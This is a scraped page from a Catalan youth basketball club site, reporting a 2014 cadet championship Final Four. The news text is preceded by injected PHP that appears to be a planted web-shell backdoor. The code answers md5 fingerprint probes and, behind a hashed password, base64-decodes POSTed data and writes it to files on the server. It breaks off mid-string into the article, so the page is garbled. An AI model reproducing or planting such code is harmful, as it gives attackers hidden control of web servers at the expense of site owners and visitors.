function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí A juga la final a 4 A-2 del campionat de Catalunya a Cadaqués - Tgn Bàsquet Club -

El cadet masculí A juga la final a 4 A-2 del campionat de Catalunya a Cadaqués

By
Updated: juny 7, 2014

El cadet masculí A pot sumar un nou èxit a la seva brillant temporada. L’equip que entrena Miquel Farran juga demà (diumenge 8 de juny) la Final a 4 A-2 del Campionat de Catalunya a Cadaqués després d’haver aconseguit proclamar-se campió de la demarcació en la fase final que es va disputar al pavelló del Serrallo i en què va vèncer a l’amfitrió, el CBT (58-67) i el Pare Manyanet en la final (63-57). El TGN Bàsquet disputarà la semifinal contra el Vilafant, el principal favorit. El Vilafant, tot i ser de Figueres, es va proclamar campió de Barcelona i té un joc molt similar al conjunt lila. “Si juguem com ho vam fer a la final a 4 de Tarragona, tenim possibilitats de vèncer, cal sortir concentrats des de l’inici”, diu Miquel Farran. El partit començarà a les 10.45 del matí i això suposarà un handicap pel TGN Bàsquet perquè necessita fer 4 hores d’autobus, segons Farran, per arribar a Cadaqués. Això significa que l’expedició lila sortirà a les dos quarts de sis del matí.

L’altra semifinal la jugaran el campió de Girona, el Salt, i el campió de Lleida, el Balaguer. En principi, el Salt surt com a favorit. La final es diputarà per la tarda. Podeu seguir la semifinal contra el Vilafant mitjançant el compte de twitter del club (@TGNBasquet).

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *